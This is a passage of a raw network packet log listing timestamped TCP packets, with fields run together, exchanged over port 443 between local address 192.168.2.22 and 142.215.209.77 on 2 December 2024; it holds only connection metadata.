                                                            Dec 2, 2024 07:29:13.275075912 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.275080919 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.418076992 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.418138981 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.418149948 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.421706915 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.421714067 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.421739101 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.421758890 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.421766043 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.421806097 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.425199986 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.425206900 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.425221920 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.425245047 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.425257921 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.429856062 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.429862976 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.429886103 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.429908037 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.429922104 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.433566093 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.433573008 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.433593035 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.433615923 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.433624029 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.436969995 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.436975956 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.437016964 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.437024117 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.441591024 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.441617012 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.441637039 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.441642046 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.441679955 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.445218086 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.445225954 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.445267916 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.445275068 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.449839115 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.449892044 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.449897051 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.453406096 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.453454971 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.453459978 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.457463026 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.457504034 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.457509995 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.461170912 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.461215019 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.461220980 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.464677095 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.464735031 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.464741945 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.469257116 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.469310045 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.469315052 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.472887993 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.472958088 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.472965002 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.477483034 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.477535963 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.477543116 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.619321108 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.619513988 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.619529009 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.622597933 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.622606039 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.622627974 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.622643948 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.622652054 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.622682095 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.627213955 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.627222061 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.627240896 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.627262115 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.627274036 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.630949974 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.630955935 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.630974054 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.630994081 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.631005049 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.634354115 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.634361982 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.634377003 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.634397030 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.634408951 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.638983965 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.638991117 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.639034986 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.639043093 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.642674923 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.642699957 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.642716885 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.642723083 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.642751932 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.647224903 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.647232056 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.647269011 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.647274971 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.650770903 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.650815010 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.650820971 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.654369116 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.654414892 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.654422045 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.658610106 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.658655882 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.658660889 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.662143946 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.662189960 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.662195921 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.666650057 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.666693926 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.666699886 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.670228958 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.670274973 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.670279980 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.674876928 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.674921036 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.674926043 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.678411961 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.678456068 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.678462982 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.827976942 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.828042984 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.828057051 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.831377983 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.831386089 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.831409931 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.831432104 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.831440926 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.831470966 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.835980892 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.835988998 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.836007118 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.836028099 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.836040974 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.839649916 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.839657068 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.839673042 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.839698076 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.839718103 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.843096972 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.843103886 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.843122005 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.843146086 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.843159914 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.847831011 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.847840071 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.847879887 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.847886086 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.851363897 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.851397038 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.851424932 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.851432085 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.851465940 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.855957031 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.855971098 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.856013060 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.856020927 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.859478951 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.859534025 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.859540939 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.863116980 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.863167048 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.863173962 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.867253065 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.867320061 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.867326021 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.870750904 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.870814085 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.870824099 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.875416040 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.875466108 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.875485897 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.879101038 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.879159927 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.879167080 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.883606911 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.883650064 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.883657932 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.887135029 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:13.887197018 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:13.887206078 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.046439886 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.046498060 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.046509981 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.049906015 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.049915075 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.049943924 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.049962997 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.049969912 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.050035000 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.054568052 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.054574966 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.054589987 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.054605961 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.054622889 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.058207035 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.058213949 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.058228970 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.058253050 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.058263063 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.061743021 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.061749935 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.061764956 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.061785936 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.061798096 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.066319942 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.066327095 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.066385031 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.066390991 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.069955111 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.069977045 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.070000887 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.070008039 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.070040941 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.074573994 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.074580908 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.074619055 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.074625969 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.078102112 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.078145981 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.078152895 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.082216024 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.082261086 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.082268000 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.085937023 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.085980892 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.085987091 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.089387894 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.089436054 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.089442968 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.094016075 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.094062090 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.094069004 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.097616911 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.097661972 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.097668886 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.102220058 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.102277994 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.102283955 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.105777979 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.105829954 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.105835915 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.252177000 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.252269983 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.252280951 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.256721973 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.256731033 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.256756067 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.256778955 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.256784916 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.256817102 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.260374069 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.260382891 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.260405064 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.260421038 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.260438919 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.263900995 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.263909101 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.263926983 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.263946056 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.263962984 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.268553972 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.268562078 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.268579006 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.268598080 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.268613100 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.272182941 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.272191048 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.272245884 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.272253990 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.276714087 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.276736975 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.276762009 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.276768923 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.276806116 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.280251980 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.280261993 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.280317068 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.280323982 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.283885956 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.283931017 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.283936977 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.288052082 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.288104057 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.288110018 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.291527033 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.291574001 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.291579962 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.296147108 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.296192884 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.296200037 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.299719095 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.299767017 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.299772978 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.304406881 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.304452896 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.304459095 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.307878971 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.307949066 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.307955027 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.311604023 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.311652899 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.311660051 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.481085062 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.481164932 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.481175900 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.484991074 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.484997988 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.485019922 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.485129118 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.485136032 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.485173941 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.488574028 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.488581896 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.488598108 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.488620043 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.488631964 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.492191076 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.492198944 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.492213011 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.492248058 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.492259979 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.496773958 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.496782064 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.496798992 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.496838093 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.496861935 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.500508070 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.500524044 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.500583887 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.500590086 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.503993988 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.504003048 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.504051924 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.504059076 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.508549929 CET44349168142.215.209.77192.168.2.22
